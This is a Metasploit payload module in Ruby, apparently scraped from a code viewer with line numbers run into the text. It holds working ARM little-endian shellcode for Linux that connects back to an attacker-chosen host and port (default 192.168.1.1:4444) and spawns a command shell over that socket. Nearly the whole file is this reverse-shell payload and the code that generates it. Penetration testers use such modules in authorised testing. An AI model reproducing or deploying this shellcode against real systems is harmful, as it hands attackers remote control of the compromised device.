Path: blob/master/modules/payloads/singles/linux/armle/shell_reverse_tcp.rb
19593 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45module MetasploitModule6CachedSize = 17278include Msf::Payload::Single9include Msf::Payload::Linux::Armle::Prepends10include Msf::Sessions::CommandShellOptions1112def initialize(info = {})13super(14merge_info(15info,16'Name' => 'Linux Command Shell, Reverse TCP Inline',17'Description' => 'Connect back to attacker and spawn a command shell',18'Author' => 'civ',19'License' => MSF_LICENSE,20'Platform' => 'linux',21'Arch' => ARCH_ARMLE,22'Handler' => Msf::Handler::ReverseTcp,23'Session' => Msf::Sessions::CommandShellUnix,24'Payload' => {25'Offsets' =>26{27'LHOST' => [ 136, 'ADDR' ],28'LPORT' => [ 134, 'n' ]29},30'Payload' =>31[32#### Tested successfully on:33# Linux 2.6.29.6-cm42 armv6l34# Linux 2.6.29.6-cyanogenmod armv6l35# Linux version 2.6.25-00350-g40fff9a armv5l36# Linux version 2.6.27-00110-g132305e armv5l37# Linux version 2.6.29-00177-g24ee4d2 armv5l38# Linux version 2.6.29-00255-g7ca5167 armv5l39#40# Probably requires process to have INTERNET permission41# or root.42####43# socket(2,1,6)440xe3a00002, # mov r0, #2 ; 0x2450xe3a01001, # mov r1, #1 ; 0x1460xe2812005, # add r2, r1, #5 ; 0x5470xe3a0708c, # mov r7, #140 ; 0x8c480xe287708d, # add r7, r7, #141 ; 0x8d490xef000000, # svc 0x000000005051# connect(soc, socaddr, 0x10)520xe1a06000, # mov r6, r0530xe28f1060, # 1dr r1, pc, #96 ; 0x60540xe3a02010, # mov r2, #16 ; 0x10550xe3a0708d, # mov r7, #141 ; 0x8d560xe287708e, # add r7, r7, #142 ; 0x8e570xef000000, # svc 0x000000005859# dup2(soc,0) @stdin600xe1a00006, # mov r0, r6610xe3a01000, # mov r1, #0 ; 0x0620xe3a0703f, # mov r7, #63 ; 0x3f630xef000000, # svc 0x000000006465# dup2(soc,1) @stdout660xe1a00006, # mov r0, r6670xe3a01001, # mov r1, #1 ; 0x1680xe3a0703f, # mov r7, #63 ; 0x3f690xef000000, # svc 0x000000007071# dup2(soc,2) @stderr720xe1a00006, # mov r0, r6730xe3a01002, # mov r1, #2 ; 0x2740xe3a0703f, # mov r7, #63 ; 0x3f750xef000000, # svc 0x000000007677# execve("/system/bin/sh", args, env)780xe28f0024, # add r0, pc, #36 ; 0x24790xe0244004, # eor r4, r4, r4800xe92d0010, # push {r4}810xe1a0200d, # mov r2, sp820xe28f4024, # add r4, pc, #36 ; 0x10830xe92d0010, # push {r4}840xe1a0100d, # mov r1, sp850xe3a0700b, # mov r7, #11 ; 0xb860xef000000, # svc 0x000000008788# <af>:89# port offset = 134, ip offset = 136900x04290002, # .word 0x5c110002 @ port: 4444 , sin_fam = 2910x0101a8c0, # .word 0x0101a8c0 @ ip: 192.168.1.192# <shell>:930x00000000, # .word 0x00000000 ; the shell goes here!940x00000000, # .word 0x00000000950x00000000, # .word 0x00000000960x00000000, # .word 0x0000000097# <arg>:980x00000000, # .word 0x00000000 ; the args!990x00000000, # .word 0x000000001000x00000000, # .word 0x000000001010x00000000, # .word 0x00000000102].pack('V*')103}104)105)106107# Register command execution options108register_options(109[110OptString.new('SHELL', [ true, 'The shell to execute.', '/bin/sh' ]),111OptString.new('ARGV0', [ false, 'argv[0] to pass to execve', 'sh' ]) # mostly used for busybox112]113)114end115116def generate(_opts = {})117p = super118119sh = datastore['SHELL']120if sh.length >= 16121raise ArgumentError, 'The specified shell must be less than 16 bytes.'122end123124p[140, sh.length] = sh125126arg = datastore['ARGV0']127if arg128if arg.length >= 16129raise ArgumentError, 'The specified argv[0] must be less than 16 bytes.'130end131132p[156, arg.length] = arg133end134135p136end137end138139140